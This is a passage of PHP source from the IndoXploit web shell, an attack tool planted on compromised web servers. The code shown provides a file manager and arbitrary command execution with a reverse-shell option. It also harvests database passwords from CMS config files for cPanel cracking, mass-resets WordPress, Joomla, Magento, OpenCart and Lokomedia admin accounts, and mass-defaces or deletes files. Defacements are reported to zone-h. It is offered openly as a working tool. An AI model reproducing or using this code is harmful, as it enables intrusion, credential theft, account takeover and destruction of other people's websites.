  1048.  
  1049. function files_and_folder() {
  1050. if(!is_dir(path())) die(color(1, 1, "Directory '".path()."' is not exists."));
  1051. if(!is_readable(path())) die(color(1, 1, "Directory '".path()."' not readable."));
  1052. print '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1053. <tr>
  1054. <th class="th_home"><center>Name</center></th>
  1055. <th class="th_home"><center>Type</center></th>
  1056. <th class="th_home"><center>Size</center></th>
  1057. <th class="th_home"><center>Last Modified</center></th>
  1058. <th class="th_home"><center>Owner/Group</center></th>
  1059. <th class="th_home"><center>Permission</center></th>
  1060. <th class="th_home"><center>Action</center></th>
  1061. </tr>';
  1062.  
  1063. if(function_exists('opendir')) {
  1064. if($opendir = opendir(path())) {
  1065. while(($readdir = readdir($opendir)) !== false) {
  1066. $dir[] = $readdir;
  1067. }
  1068. closedir($opendir);
  1069. }
  1070. sort($dir);
  1071. } else {
  1072. $dir = scandir(path());
  1073. }
  1074.  
  1075. foreach($dir as $folder) {
  1076. $dirinfo['path'] = path().DIRECTORY_SEPARATOR.$folder;
  1077. if(!is_dir($dirinfo['path'])) continue;
  1078. $dirinfo['type'] = filetype($dirinfo['path']);
  1079. $dirinfo['time'] = date("F d Y g:i:s", filemtime($dirinfo['path']));
  1080. $dirinfo['size'] = "-";
  1081. $dirinfo['perms'] = writeable($dirinfo['path'], perms($dirinfo['path']));
  1082. $dirinfo['link'] = ($folder === ".." ? "<a href='?dir=".dirname(path())."'>$folder</a>" : ($folder === "." ? "<a href='?dir=".path()."'>$folder</a>" : "<a href='?dir=".$dirinfo['path']."'>$folder</a>"));
  1083. $dirinfo['action']= ($folder === '.' || $folder === '..') ? "<a href='?act=newfile&dir=".path()."'>newfile</a> | <a href='?act=newfolder&dir=".path()."'>newfolder</a>" : "<a href='?act=rename_folder&dir=".$dirinfo['path']."'>rename</a> | <a href='?act=delete_folder&dir=".$dirinfo['path']."'>delete</a>";
  1084. if(function_exists('posix_getpwuid')) {
  1085. $dirinfo['owner'] = (object) @posix_getpwuid(fileowner($dirinfo['path']));
  1086. $dirinfo['owner'] = $dirinfo['owner']->name;
  1087. } else {
  1088. $dirinfo['owner'] = fileowner($dirinfo['path']);
  1089. }
  1090. if(function_exists('posix_getgrgid')) {
  1091. $dirinfo['group'] = (object) @posix_getgrgid(filegroup($dirinfo['path']));
  1092. $dirinfo['group'] = $dirinfo['group']->name;
  1093. } else {
  1094. $dirinfo['group'] = filegroup($dirinfo['path']);
  1095. }
  1096. print "<tr>";
  1097. print "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>".$dirinfo['link']."</td>";
  1098. print "<td class='td_home' style='text-align: center;'>".$dirinfo['type']."</td>";
  1099. print "<td class='td_home' style='text-align: center;'>".$dirinfo['size']."</td>";
  1100. print "<td class='td_home' style='text-align: center;'>".$dirinfo['time']."</td>";
  1101. print "<td class='td_home' style='text-align: center;'>".$dirinfo['owner'].DIRECTORY_SEPARATOR.$dirinfo['group']."</td>";
  1102. print "<td class='td_home' style='text-align: center;'>".$dirinfo['perms']."</td>";
  1103. print "<td class='td_home' style='padding-left: 15px;'>".$dirinfo['action']."</td>";
  1104. print "</tr>";
  1105. }
  1106. foreach($dir as $files) {
  1107. $fileinfo['path'] = path().DIRECTORY_SEPARATOR.$files;
  1108. if(!is_file($fileinfo['path'])) continue;
  1109. $fileinfo['type'] = filetype($fileinfo['path']);
  1110. $fileinfo['time'] = date("F d Y g:i:s", filemtime($fileinfo['path']));
  1111. $fileinfo['size'] = filesize($fileinfo['path'])/1024;
  1112. $fileinfo['size'] = round($fileinfo['size'],3);
  1113. $fileinfo['size'] = ($fileinfo['size'] > 1024) ? round($fileinfo['size']/1024,2). "MB" : $fileinfo['size']. "KB";
  1114. $fileinfo['perms']= writeable($fileinfo['path'], perms($fileinfo['path']));
  1115. if(function_exists('posix_getpwuid')) {
  1116. $fileinfo['owner'] = (object) @posix_getpwuid(fileowner($fileinfo['path']));
  1117. $fileinfo['owner'] = $fileinfo['owner']->name;
  1118. } else {
  1119. $fileinfo['owner'] = fileowner($fileinfo['path']);
  1120. }
  1121. if(function_exists('posix_getgrgid')) {
  1122. $fileinfo['group'] = (object) @posix_getgrgid(filegroup($fileinfo['path']));
  1123. $fileinfo['group'] = $fileinfo['group']->name;
  1124. } else {
  1125. $fileinfo['group'] = filegroup($fileinfo['path']);
  1126. }
  1127. print "<tr>";
  1128. print "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=".path()."&file=".$fileinfo['path']."'>$files</a></td>";
  1129. print "<td class='td_home' style='text-align: center;'>".$fileinfo['type']."</td>";
  1130. print "<td class='td_home' style='text-align: center;'>".$fileinfo['size']."</td>";
  1131. print "<td class='td_home' style='text-align: center;'>".$fileinfo['time']."</td>";
  1132. print "<td class='td_home' style='text-align: center;'>".$fileinfo['owner'].DIRECTORY_SEPARATOR.$fileinfo['group']."</td>";
  1133. print "<td class='td_home' style='text-align: center;'>".$fileinfo['perms']."</td>";
  1134. print "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=".path()."&file=".$fileinfo['path']."'>edit</a> | <a href='?act=rename&dir=".path()."&file=".$fileinfo['path']."'>rename</a> | <a href='?act=delete&dir=".path()."&file=".$fileinfo['path']."'>delete</a> | <a href='?act=download&dir=".path()."&file=".$fileinfo['path']."'>download</a></td>";
  1135. print "</tr>";
  1136. }
  1137.  
  1138. print "</table>";
  1139. print "<center>Copyright &copy; ".date("Y")." - <a href='http://indoxploit.or.id/' target='_blank'>".color(1, 2, "IndoXploit")."</a></center>";
  1140. }
  1141.  
  1142.  
  1143. function action() {
  1144. tools("upload");
  1145. tools("cmd");
  1146. print "<hr style='margin-top: 15px; margin-bottom: 10px;'>";
  1147. print "<center>";
  1148. print "<ul>";
  1149. print "<li>[ <a href='?'>Home</a> ]</li>";
  1150. print "<li>[ <a href='?dir=".path()."&do=fakeroot'>Fake Root</a> ]</li>";
  1151. print "<li>[ <a href='?dir=".path()."&do=cpanel'>cPanel Crack</a> ]</li>";
  1152. print "<li>[ <a href='?dir=".path()."&do=mpc'>Mass Password Change</a> ]</li>";
  1153. print "<li>[ <a href='?dir=".path()."&do=mass'>Mass Deface/Delete</a> ]</li>";
  1154. print "<li>[ <a href='?dir=".path()."&do=lre'>Local Root Exploiter</a> ]</li>";
  1155. print "<li>[ <a href='?dir=".path()."&do=zoneh'>Zone-H</a> ]</li>";
  1156. print "</ul>";
  1157. print "</center>";
  1158. print "<hr style='margin-top: 15px; margin-bottom: 10px;'>";
  1159.  
  1160.  
  1161. if(isset($_GET['do'])) {
  1162. if($_GET['do'] === "cmd") {
  1163. if(isset($_POST['cmd'])) {
  1164. if(preg_match("/^rf (.*)$/", $_POST['cmd'], $match)) {
  1165. tools("readfile", $match[1]);
  1166. }
  1167. elseif(preg_match("/^spawn (.*)$/", $_POST['cmd'], $match)) {
  1168. tools("spawn", $match[1]);
  1169. }
  1170. elseif(preg_match("/^symlink$/", $_POST['cmd'], $match)) {
  1171. tools("symlink");
  1172. }
  1173. elseif(preg_match("/^rvr (.*)$/", $_POST['cmd'], $match)) {
  1174. tools("network", $match[1]);
  1175. }
  1176. elseif(preg_match("/^krdp$/", $_POST['cmd'])) {
  1177. tools("krdp");
  1178. }
  1179. elseif(preg_match("/^jumping$/", $_POST['cmd'])) {
  1180. tools("jumping");
  1181. }
  1182. elseif(preg_match("/^idxconfig$/", $_POST['cmd'])) {
  1183. tools("idxconfig");
  1184. }
  1185. elseif(preg_match("/^logout$/", $_POST['cmd'])) {
  1186. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1187. print "<script>window.location='?';</script>";
  1188. }
  1189. elseif(preg_match("/^killme$/", $_POST['cmd'])) {
  1190. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1191. @unlink(__FILE__);
  1192. print "<script>window.location='?';</script>";
  1193. }
  1194. else {
  1195. print "<pre>".exe($_POST['cmd'])."</pre>";
  1196. }
  1197. }
  1198. else {
  1199. files_and_folder();
  1200. }
  1201. }
  1202. elseif($_GET['do'] === "zoneh") {
  1203. if(isset($_POST['submit']) AND $_GET['do'] === "zoneh") {
  1204. $nick = $_POST['nick'];
  1205. $domain = explode("\r\n", $_POST['url']);
  1206.  
  1207. print "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1208. print "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1209.  
  1210. foreach($domain as $no => $url) {
  1211. $no = ($no+1).".";
  1212. $post = curl("http://www.zone-h.org/notify/single", TRUE, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1213. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $post)) {
  1214. print "$no $url -> ".color(1, 2, "OK")."<br>";
  1215. } else {
  1216. print "$no $url -> ".color(1, 1, "ERROR")."<br>";
  1217. }
  1218. }
  1219. }
  1220. else {
  1221. print "<center><form method='post' action='?do=zoneh&dir=".path()."'>
  1222. Defacer: <br>
  1223. <input type='text' name='nick' size='50' value='IndoXploit'><br><br>
  1224. Domains: <br>
  1225. <textarea style='width: 450px; height: 150px;' name='url' placeholder='http://google.com/'></textarea><br>
  1226. <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px;' type='submit' name='submit' value='Submit'>
  1227. </form></center>";
  1228. }
  1229. }
  1230. elseif($_GET['do'] == 'cpanel') {
  1231. if($_POST['crack']) {
  1232. $usercp = explode("\r\n", $_POST['user_cp']);
  1233. $passcp = explode("\r\n", $_POST['pass_cp']);
  1234. $i = 0;
  1235. foreach($usercp as $ucp) {
  1236. foreach($passcp as $pcp) {
  1237. $connect = mysql_connect('localhost', $ucp, $pcp);
  1238. if($connect) {
  1239. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1240. } else {
  1241. $_SESSION[$ucp] = "1";
  1242. $_SESSION[$pcp] = "1";
  1243. if($ucp === '' || $pcp === '') {
  1244. //
  1245. } else {
  1246. $i++;
  1247. print "username (".color(1, 2, $ucp).") password (".color(1, 2, $pcp).") domain (";
  1248. if(!function_exists('posix_getpwuid')) print color(1, 1, "Function is Disable by System!");
  1249. if(!getdomainname()) print color(1, 1, "Can't get domain name");
  1250. foreach(getdomainname() as $domain) {
  1251. $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
  1252. $userdomain = $userdomain->name;
  1253. if($userdomain === $user) {
  1254. print "<a href='http://$domain/' target='_blank'>".color(1, 2, $domain)."</a><br>";
  1255. break;
  1256. }
  1257. }
  1258. print (empty($domain)) ? color(1, 1, "Can't get domain name.") : color(1, 2, $domain);
  1259. print ")<br>";
  1260. }
  1261. }
  1262. mysql_close($connect);
  1263. }
  1264. }
  1265. }
  1266. print ($i === 0) ? "" : "<p>".color(1, 3, "Sukses nyolong $i Cpanel by IndoXploit")."</p>";
  1267. } else {
  1268. print "<center>
  1269. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1270. <form method='post'>
  1271. USER: <br>
  1272. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1273. print implode("\n", getuser());
  1274. print "</textarea><br>
  1275. PASS: <br>
  1276. <span>Grab Password from Link Config:</span><br>
  1277. <input style='width: 425px; background: transparent; border: 1px solid #ffffff; color: #ffffff;' type='text' name='linkpass' placeholder='http://web.com/idx_config/'>
  1278. <input style='background: transparent; border: 1px solid #ffffff; color: #ffffff;' type='submit' name='submitlink' value='>>'>
  1279. <br>
  1280. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1281.  
  1282. if(isset($_POST['submitlink'])) {
  1283. $getpass = $_POST['linkpass'];
  1284. $get = curl($_POST['linkpass']);
  1285. preg_match_all('/<a href="(.*?).txt">/', $get, $link);
  1286. foreach($link[1] as $link_config) {
  1287. $scandir[] = "$link_config.txt";
  1288. }
  1289. }
  1290. else {
  1291. $getpass = path();
  1292. $scandir = scandir($getpass);
  1293. }
  1294.  
  1295. $password = "";
  1296.  
  1297. foreach($scandir as $files) {
  1298. $file = "$getpass/$files";
  1299. $config = file_get_contents($file);
  1300. if(preg_match("/WordPress/", $config)) {
  1301. $password .= getValue($config, "DB_PASSWORD', '", "'")."\n";
  1302. }
  1303. elseif(preg_match("/JConfig|joomla/", $config)) {
  1304. $password .= getValue($config, "password = '", "'")."\n";
  1305. }
  1306. elseif(preg_match("/Magento|Mage_Core/", $config)) {
  1307. $password .= getValue($config, "<password><![CDATA[", "]]></password>")."\n";
  1308. }
  1309. elseif(preg_match("/panggil fungsi validasi xss dan injection/", $config)) {
  1310. $password .= getValue($config, 'password = "', '"')."\n";
  1311. }
  1312. elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $config)) {
  1313. $password .= getValue($config, "'DB_PASSWORD', '", "'")."\n";
  1314. }
  1315. elseif(preg_match("/^[client]$/", $config)) {
  1316. preg_match("/password=(.*?)/", $config, $pass);
  1317. if(preg_match('/"/', $pass[1])) {
  1318. $pass[1] = str_replace('"', "", $pass[1]);
  1319. $password .= $pass[1]."\n";
  1320. }
  1321. else {
  1322. $password .= $pass[1]."\n";
  1323. }
  1324. }
  1325. elseif(preg_match("/cc_encryption_hash/", $config)) {
  1326. $password .= getValue($config, "db_password = '", "'")."\n";
  1327. }
  1328. }
  1329.  
  1330. print $password;
  1331.  
  1332. print "</textarea><br>
  1333. <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px;' type='submit' name='crack' value='Crack'>
  1334. </form></center>";
  1335. }
  1336. }
  1337. elseif($_GET['do'] == 'mpc') {
  1338. if($_POST['hajar']) {
  1339. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1340. print "username atau password harus lebih dari 6 karakter";
  1341. }
  1342. else {
  1343. $user_baru = $_POST['user_baru'];
  1344. $pass_baru = md5($_POST['pass_baru']);
  1345. $conf = $_POST['config_dir'];
  1346.  
  1347. if(preg_match("/^http:\/\//", $conf) OR preg_match("/^https:\/\//", $conf)) {
  1348. $get = curl($conf);
  1349. preg_match_all('/<a href="(.*?).txt">/', $get, $link);
  1350. foreach($link[1] as $link_config) {
  1351. $scan_conf[] = "$link_config.txt";
  1352. }
  1353. }
  1354. else {
  1355. $scan_conf = scandir($conf);
  1356. }
  1357.  
  1358. foreach($scan_conf as $file_conf) {
  1359. $config = file_get_contents("$conf/$file_conf");
  1360. if(preg_match("/JConfig|joomla/",$config)) {
  1361. $dbhost = getValue($config,"host = '","'");
  1362. $dbuser = getValue($config,"user = '","'");
  1363. $dbpass = getValue($config,"password = '","'");
  1364. $dbname = getValue($config,"db = '","'");
  1365. $dbprefix = getValue($config,"dbprefix = '","'");
  1366. $prefix = $dbprefix."users";
  1367. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1368. $db = mysql_select_db($dbname);
  1369. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1370. $result = mysql_fetch_array($q);
  1371. $id = $result['id'];
  1372. $site = getValue($config,"sitename = '","'");
  1373. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1374. print "Config => ".$file_conf."<br>";
  1375. print "CMS => Joomla<br>";
  1376. if($site == '') {
  1377. print "Sitename => ".color(1, 1, "Can't get domain name")."<br>";
  1378. }
  1379. else {
  1380. print "Sitename => $site<br>";
  1381. }
  1382. if(!$update OR !$conn OR !$db) {
  1383. print "Status => ".color(1, 1, mysql_error())."<br><br>";
  1384. }
  1385. else {
  1386. print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
  1387. }
  1388. mysql_close($conn);
  1389. } elseif(preg_match("/WordPress/",$config)) {
  1390. $dbhost = getValue($config,"DB_HOST', '","'");
  1391. $dbuser = getValue($config,"DB_USER', '","'");
  1392. $dbpass = getValue($config,"DB_PASSWORD', '","'");
  1393. $dbname = getValue($config,"DB_NAME', '","'");
  1394. $dbprefix = getValue($config,"table_prefix = '","'");
  1395. $prefix = $dbprefix."users";
  1396. $option = $dbprefix."options";
  1397. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1398. $db = mysql_select_db($dbname);
  1399. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1400. $result = mysql_fetch_array($q);
  1401. $id = $result[ID];
  1402. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1403. $result2 = mysql_fetch_array($q2);
  1404. $target = $result2[option_value];
  1405. if($target == '') {
  1406. $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
  1407. }
  1408. else {
  1409. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1410. }
  1411. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1412. print "Config => ".$file_conf."<br>";
  1413. print "CMS => Wordpress<br>";
  1414. print $url_target;
  1415. if(!$update OR !$conn OR !$db) {
  1416. print "Status => ".color(1, 1, mysql_error())."<br><br>";
  1417. }
  1418. else {
  1419. print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
  1420. }
  1421. mysql_close($conn);
  1422. }
  1423. elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1424. $dbhost = getValue($config,"<host><![CDATA[","]]></host>");
  1425. $dbuser = getValue($config,"<username><![CDATA[","]]></username>");
  1426. $dbpass = getValue($config,"<password><![CDATA[","]]></password>");
  1427. $dbname = getValue($config,"<dbname><![CDATA[","]]></dbname>");
  1428. $dbprefix = getValue($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1429. $prefix = $dbprefix."admin_user";
  1430. $option = $dbprefix."core_config_data";
  1431. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1432. $db = mysql_select_db($dbname);
  1433. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1434. $result = mysql_fetch_array($q);
  1435. $id = $result[user_id];
  1436. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1437. $result2 = mysql_fetch_array($q2);
  1438. $target = $result2[value];
  1439. if($target == '') {
  1440. $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
  1441. }
  1442. else {
  1443. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1444. }
  1445. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1446. print "Config => ".$file_conf."<br>";
  1447. print "CMS => Magento<br>";
  1448. print $url_target;
  1449. if(!$update OR !$conn OR !$db) {
  1450. print "Status => ".color(1, 1, mysql_error())."<br><br>";
  1451. }
  1452. else {
  1453. print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
  1454. }
  1455. mysql_close($conn);
  1456. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1457. $dbhost = getValue($config,"'DB_HOSTNAME', '","'");
  1458. $dbuser = getValue($config,"'DB_USERNAME', '","'");
  1459. $dbpass = getValue($config,"'DB_PASSWORD', '","'");
  1460. $dbname = getValue($config,"'DB_DATABASE', '","'");
  1461. $dbprefix = getValue($config,"'DB_PREFIX', '","'");
  1462. $prefix = $dbprefix."user";
  1463. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1464. $db = mysql_select_db($dbname);
  1465. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1466. $result = mysql_fetch_array($q);
  1467. $id = $result[user_id];
  1468. $target = getValue($config,"HTTP_SERVER', '","'");
  1469. if($target == '') {
  1470. $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
  1471. }
  1472. else {
  1473. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1474. }
  1475. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1476. print "Config => ".$file_conf."<br>";
  1477. print "CMS => OpenCart<br>";
  1478. print $url_target;
  1479. if(!$update OR !$conn OR !$db) {
  1480. print "Status => ".color(1, 1, mysql_error())."<br><br>";
  1481. }
  1482. else {
  1483. print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
  1484. }
  1485. mysql_close($conn);
  1486. }
  1487. elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1488. $dbhost = getValue($config,'server = "','"');
  1489. $dbuser = getValue($config,'username = "','"');
  1490. $dbpass = getValue($config,'password = "','"');
  1491. $dbname = getValue($config,'database = "','"');
  1492. $prefix = "users";
  1493. $option = "identitas";
  1494. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1495. $db = mysql_select_db($dbname);
  1496. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1497. $result = mysql_fetch_array($q);
  1498. $target = $result[alamat_website];
  1499. if($target == '') {
  1500. $target2 = $result[url];
  1501. $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
  1502. if($target2 == '') {
  1503. $url_target2 = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
  1504. }
  1505. else {
  1506. $cek_login3 = file_get_contents("$target2/adminweb/");
  1507. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1508. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1509. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1510. }
  1511. elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1512. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1513. }
  1514. else {
  1515. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1516. }
  1517. }
  1518. } else {
  1519. $cek_login = file_get_contents("$target/adminweb/");
  1520. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1521. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1522. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1523. }
  1524. elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1525. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1526. }
  1527. else {
  1528. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1529. }
  1530. }
  1531. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1532. print "Config => ".$file_conf."<br>";
  1533. print "CMS => Lokomedia<br>";
  1534. if(preg_match("/Can't get domain name/", $url_target)) {
  1535. print $url_target2;
  1536. }
  1537. else {
  1538. print $url_target;
  1539. }
  1540. if(!$update OR !$conn OR !$db) {
  1541. print "Status => ".color(1, 1, mysql_error())."<br><br>";
  1542. }
  1543. else {
  1544. print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
  1545. }
  1546. mysql_close($conn);
  1547. }
  1548. }
  1549. }
  1550. }
  1551. else {
  1552. print "<center>
  1553. <h1>Mass Password Change</h1>
  1554. <form method='post'>
  1555. <input type='radio' name='config_type' value='dir' checked>DIR Config<input type='radio' name='config_type' value='link'>LINK Config<br>
  1556. <input type='text' size='50' name='config_dir' value='".path()."'><br><br>
  1557. Set User & Pass: <br>
  1558. <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
  1559. <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
  1560. <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 215px; margin: 5px auto;' type='submit' name='hajar' value='Hajar!'>
  1561. </form></center>";
  1562. }
  1563. }
  1564. elseif($_GET['do'] === "mass") {
  1565. if($_POST['start']) {
  1566. if($_POST['mass_type'] === 'singledir') {
  1567. print "<div style='margin: 5px auto; padding: 5px'>";
  1568. massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file']);
  1569. print "</div>";
  1570. }
  1571. elseif($_POST['mass_type'] === 'alldir') {
  1572. print "<div style='margin: 5px auto; padding: 5px'>";
  1573. massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file'], "-alldir");
  1574. print "</div>";
  1575. }
  1576. elseif($_POST['mass_type'] === "delete") {
  1577. print "<div style='margin: 5px auto; padding: 5px'>";
  1578. massdelete($_POST['d_dir'], $_POST['d_file']);
  1579. print "</div>";
  1580. }
  1581. }
  1582. else {
  1583. print "<center><form method='post'>
  1584. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  1585. <input type='radio' name='mass_type' value='singledir' checked>Mass Deface Single Directory<input type='radio' name='mass_type' value='alldir'>Mass Deface All Directory<input type='radio' name='mass_type' value='delete'>Mass Delete File<br>
  1586. <span>( kosongkan 'Index File' jika memilih Mass Delete File )</span><br><br>
  1587. <font style='text-decoration: underline;'>Folder:</font><br>
  1588. <input type='text' name='d_dir' value='".path()."' style='width: 450px;' height='10'><br><br>
  1589. <font style='text-decoration: underline;'>Filename:</font><br>
  1590. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br><br>
  1591. <font style='text-decoration: underline;'>Index File:</font><br>
  1592. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
  1593. <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px; margin: 5px auto;' type='submit' name='start' value='Mass'>
  1594. </form></center>";
  1595. }
  1596. }
  1597. elseif($_GET['do'] == 'fakeroot') {
  1598. ob_start();
  1599.  
  1600. $site = explode("\r\n", $_POST['url']);
  1601. $user = usergroup()->name;
  1602. $file = $_POST['file'];
  1603.  
  1604. if(!preg_match("#/home/$user/public_html#", $_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "I think this server not using shared host :("));
  1605.  
  1606.  
  1607. if($_POST['reverse']) {
  1608. if(!is_writable($_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "Directory '".$_SERVER['DOCUMENT_ROOT']."' is not writeable."));
  1609. if(!is_writable(dirname($_SERVER['DOCUMENT_ROOT']))) die(color(1, 1, "Directory '".dirname($_SERVER['DOCUMENT_ROOT'])."' is not writeable."));
  1610.  
  1611. save($_SERVER['DOCUMENT_ROOT']."/".$file, "w", $_POST['script']);
  1612. save(dirname($_SERVER['DOCUMENT_ROOT'])."/".$file, "w", $_POST['script']);
  1613.  
  1614. foreach($site as $url) {
  1615. $cek = curl("$url/~$user/$file");
  1616. if(preg_match("/hacked/i", $cek)) {
  1617. print "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  1618. }
  1619. }
  1620. } else {
  1621. print "<center><form method='post'>
  1622. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1623. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1624. Domain: <br>
  1625. <textarea style='width: 450px; height: 250px;' name='url'>";
  1626. print implode("\n", reverse());
  1627. print "</textarea><br>
  1628. <font style='text-decoration: underline;'>Index File:</font><br>
